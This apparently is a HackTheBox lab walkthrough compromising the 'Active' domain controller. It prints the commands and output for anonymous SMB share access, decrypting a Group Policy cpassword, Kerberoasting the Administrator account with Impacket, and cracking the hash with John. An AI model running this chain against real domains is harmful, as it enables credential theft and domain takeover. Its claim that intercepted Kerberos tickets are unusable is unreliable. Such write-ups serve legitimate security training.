HackTheBox: Active Walkthrough
Active was an example of an easy box that still provided a lot of opportunity to learn. The box was centered around common vulnerabilities associated with Active Directory. There’s a good chance to practice SMB enumeration. It also gives the opportunity to use Kerberoasting against a Windows Domain, which, if you’re not a pentester, you may not have had the chance to do before.
Let’s start with first things first run and nmap scan on the box to see what ports are open and what services are running on these ports.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 03:07 EDT
Nmap scan report for 10.10.10.100
Host is up (0.21s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-07 07:07:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-07-07T07:08:46
|_ start_date: 2023-07-07T07:05:01
|_clock-skew: -1s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.09 secondsOpen Ports that looks interesting.
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-07 07:07:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?We have a lot of information from the nmap scan.
Enumeration
The nmap scan discloses the domain name of the machine active.htb, So let’s add this to our host file.
echo "10.10.10.100 active.htb" >> /etc/hostsThe first thing I’m going to try to enumerate is DNS. Let’s use nslookup to learn more information about this domain.
nslookup
> 10.10.10.100
;; communications error to 192.168.239.2#53: timed out
** server can't find 100.10.10.10.in-addr.arpa: NXDOMAIN
> It’s timed out no luck now let’s try zone transfer.
host -l active.htb 10.10.10.100
Using domain server:
Name: 10.10.10.100
Address: 10.10.10.100#53
Aliases:
Host active.htb not found: 5(REFUSED)
; Transfer failed.So we’ll move on to enumerating SMB on ports 139 and 445. We’ll start with viewing the SMB shares. For that I will be using smbmap tool. I found it very useful for enumerating smb shares.
smbmap -H active.htb
We have found a share “Replication” where can see the information without any authentication. Let’s login and view the files from this share.
smbclient //active.htb/Replication -N
-N: suppresses the password since we’re logging in anonymously
We’re in!
After looking all the shares, I’ve found group.xml in the following directory.
cd Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
Now download this file and see what information this file is containing.
get Groups.xml
cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>We have an Username “active.htb\SVC_TGS” and encrypted password that will allow us to gain initial foothold.
As mentioned above, the password is encrypted with AES, which is a strong encryption algorithm. However, since the key is posted online, we can easily decrypt the encrypted password.
There’s a simple ruby program known as gpp-decrypt that uses the publicly disclosed key to decrypt any given GPP encrypted string. This program is included with the default installation of Kali.
Let’s use it to decrypt the password we found.
From the Groups.xml file, we know that the username is SVG_TGS. This probably is not the admin user, but regardless let’s try to access the ADMIN$ share with the username/password we found.
It doesn’t work. Let’s try Users share.
cd \SVC_TGS\Desktop\
get user.txt
cat user.txt
7117a97bb6d0………We compromised a low privileged user. Now we need to escalate privileges.
As we are dealing with Active directory, Kerberos is a network authentication protocol that is used to securely authenticate users to network services. It is a ticket-based protocol, which means that users are authenticated by presenting a ticket that has been issued by a trusted authority.
The three main components of Kerberos are:
- The Key Distribution Center (KDC): The KDC is the central authority that issues tickets and manages the Kerberos database.
- The Authentication Service (AS): The AS is responsible for issuing tickets to users.
- The Ticket Granting Service (TGS): The TGS is responsible for issuing tickets to services.
Here is an example of how Kerberos works:
- A user wants to access a network service.
- The user’s computer sends a request to the KDC.
- The KDC issues a ticket to the user.
- The user’s computer sends the ticket to the service.
- The service verifies the ticket and grants the user access.
Kerberos is a secure protocol because it uses encryption to protect the tickets. This means that even if an attacker intercepted a ticket, they would not be able to use it to authenticate themselves to the service.
Kerberos is a widely used protocol and is supported by many operating systems and applications. It is a key component of many enterprise security solutions.
Here is an image that summarizes the Kerberos authentication process:
If you compromise a user that has a valid kerberos ticket-granting ticket (TGT), then you can request one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server shown in the above figure.
A portion of the TGS ticket is encrypted with the hash of the service account associated with the SPN. Therefore, you can run an offline brute force attack on the encrypted portion to reveal the service account password. Therefore, if you request an administrator account TGS ticket and the administrator is using a weak password, we’ll be able to crack it!
To do that, download Impacket. This includes a collection of Python classes for working with network protocols.
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
python setup.py install #install softwareThey have a script in the /examples folder called GetUserSPNs.py that is used to find SPNs that are associated with a given user account. It will output a set of valid TGSs it requested for those SPNs.
Run the script using the SVC_TGS credentials we found.
./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-07-07 03:06:18.670972
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$139d7c6ddd9411ec4279b34c76960ad5$11ae54ce76588b2cbd97c8ac79b277dfcf05705301fc6b6470e6e46adb91a8e6308bb2df0d826c8132b2accc993169745cbd7534922479cac51afda32d4255cb76eec1fc945780844c35e33b2cfa0bffb4039c3a262ce3d590c13769b12abbd7b24290384db8fd9bf6a77f25f02254618621dc802559119bec09755b242c3b72cfff43610ab5a3c41e6bc472d7bae78a80b7c298b6436cfe4a72bcff268ba5edb1a05040aed69020daad203dd5ba9d35dc2c9bef00913380dcba77d1994719b4dcc1e91472992eab6d8a592282d6fdaa3c3861abb6fb7bea95704cbc9d34407bc6d2e9969bddc1172f29ab814d55386211121190b7471ff5fc81d983d25880362cb0e8f8c716c8e1040c75bf64a70f65541c2871f4bcfac769bac9d756269afdb6ba9aba789d198570a4fdfb943b9a825001d5a18acc641e207d46c3659dd28f7cec7c91db9d2f98da1a41f952260ff6df745fd3671063b7264a9c5793217160f1c8757f369eb2d7078ccf0240eb115a5d8331b995a70a6dbb7d0d565f083f20e6f7a934a1f9f91d549a1e2841e8cd52c8cb6ce440a870ecb79b2f1e87186cf8069a18731c3e3f82064c167e382492e1253d5eb216d347a3a3fc581cf5bdef2fa10e9d48ddcf1876402f61d28e36ea37664c51ed8920e2d2e699e6be48ea44874817c12605759d0e75881c4b68485cf6d518da73557876ec42e4cd31b22464dc1d69a1bcefea14a9039633f023655bf8784de51ad30d13a9b45b323db44b8cd7ac068c2db4fd290125e156513cac79c24b14f420673e541f8c7c324e963ec5c05dec7e80f56bbd2db01d95899920a66be8cf6c4d3a8971af9a3898825c801fa308b6de2716e5cdd1467aee8ee4e3f61613ee25bc2809c02b5caa91dd7165ead18c6ff850d72aaf834a8cefee5630716fd7c6288456f9b8b6f6a7032ad56c973f3a05c31a1cc63cbbde02cd552ef34f3b673a57d8c238f0ac25bbd5e015b929f84e76f3d496ef9908846a98db004d9c6f996389accc13c513246ae453d7541b6e93d6ff50071d038c816e81c1bc67bc345891c5a10bf5e81237068f73e2009270e35841a8da9d8de36db1c9c96b4895a18c33bb295d3f0c0ab3989fb724d66abd39e51aa2bafdf8ee7132201bee43bec0e67c0dbeb217fc701733680cc2a7e1c2830db94929a78c5b2ef8d9a36cd86c6843366083a062d7ddaa6e883d01c35eee13b2f11b4b1b2111ca3918b3fe59f3cdcb7bd972da895748a013We were able to request a TGS from an Administrator SPN. If we can crack the TGS, we’ll be able to escalate privileges!
Note: If you get a “Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)”, it’s probably because the attack machine date and time are not in sync with the Kerberos server.
Now that we have a valid TGS that is already in John the Ripper format, let’s try to crack it.
john --wordlist=/usr/share/wordlists/rockyou.txt admin.txt
To login as the administrator, we’ll use another Impacket script known as psexec.py. As shown in the help menu, you can run the script using the following command.
Navigate to the directory that contains the root.txt flag.
cd C:\Users\Administrator\DesktopView the content of the flag.
Stay tuned for next writeup!
